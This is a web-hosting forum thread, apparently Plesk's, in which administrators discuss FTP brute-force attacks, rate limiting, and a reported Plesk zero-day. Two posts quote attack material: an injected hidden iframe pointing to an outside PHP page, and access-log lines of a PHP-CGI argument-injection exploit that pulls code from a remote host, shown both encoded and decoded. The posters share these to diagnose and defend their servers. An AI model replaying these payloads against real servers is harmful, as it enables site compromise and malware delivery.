Under Attack?

[IgorG]

how we can solve this problem totally.

Regards,
Hamed

I do not see information from you that you are using all the latest OS and Plesk updates and I did not received login credentials from you in PM.

 

[hamed23100]

I do not see information from you that you are using all the latest OS and Plesk updates and I did not received login credentials from you in PM.

we use latest updates, i can not provide login credentials because of limitation on RDP allowed IP addresses in hardware firewall, but if you say me where exactly i can see FTP logs in windows server 2008 i can provide it to you,

Regards,
Hamed

 

[IgorG]

Sorry, but our guys from Security Team would like to investigate this issue directly on affected Plesk server which fully satisfy mentioned conditions.

 

[hamed23100]

Hi,

do you know from which countries attacks done? i couldnt find any IP address to block it, i want to block all attackers countries IP address to FTP because another attack was done today:
<!-- . --><iframe width="1px" height="1px" src="http://www.testotic.mrbasic.com/openstat/appropriate/audience_clearest_concerns_sophisticating.php" style="display: block;" ></iframe>

 

[Spyder]

Our problems are on Old plesks 8.xx but seems BLOCK ALL FTP from ALL sources help maintain clean. until now all sites are OK.

 

[iantresman]

1. Someone mentioned a brute-force FTP attack, with the log showing about 10 attempts per second. Is it not possible to restrict attempts to the same account, to only once per ten seconds or more?

2. I think cPanel has an option to disable FTP access, unless you enable it in the Control Panel for say, 60 minutes, before it automatically closes access. I wouldn't necessary endorse this, as it could enable a keyboard logger to then gain access to your Control Panel. Tublr has a nice option where you can post a message using a secret email address. I wonder whether a secret email could be used to enable FTP access for limited time. eg. ftp-secret-code-2255$$@mydomain.com

 

[Linulex]

1. Someone mentioned a brute-force FTP attack, with the log showing about 10 attempts per second. Is it not possible to restrict attempts to the same account, to only once per ten seconds or more

http://linux.die.net/man/5/xinetd.conf

Edit /etc/xinetd.d/ftp_psa

instances
per_source

are the configurations you would want to look at

reagrds
Jan

 

[iantresman]

Thanks for that. I'm not sure if it's what I want, but I shall give it a thorough read through.

 

[Azurel]

Here an info for all Plesk 8/9 users..

http://www.heise.de/security/meldung/Angeblicher-Zero-Day-Exploit-fuer-Plesk-1883732.html (german)
http://seclists.org/fulldisclosure/2013/Jun/25 (english)

I found in my /var/log/httpd/access_log my lines like this (from different ips):

199.241.30.23 - - [17/Jun/2013:21:32:38 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.0" 404 272 "-" "Mozilla/5.0 (compatible; Googlebot/2.1;

String decoded: /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n

and decoded too:

189.73.185.158 - - [20/Jun/2013:00:11:33 +0200] "GET /phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+disable_functions%3d''+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp://blackhole.hostenko.com/1.txt+-n HTTP/1.0" 404 272 "-" "MSIE9"

I use plesk 11.0.9#53. I think with 404 return code this was not successful in 11.0.9?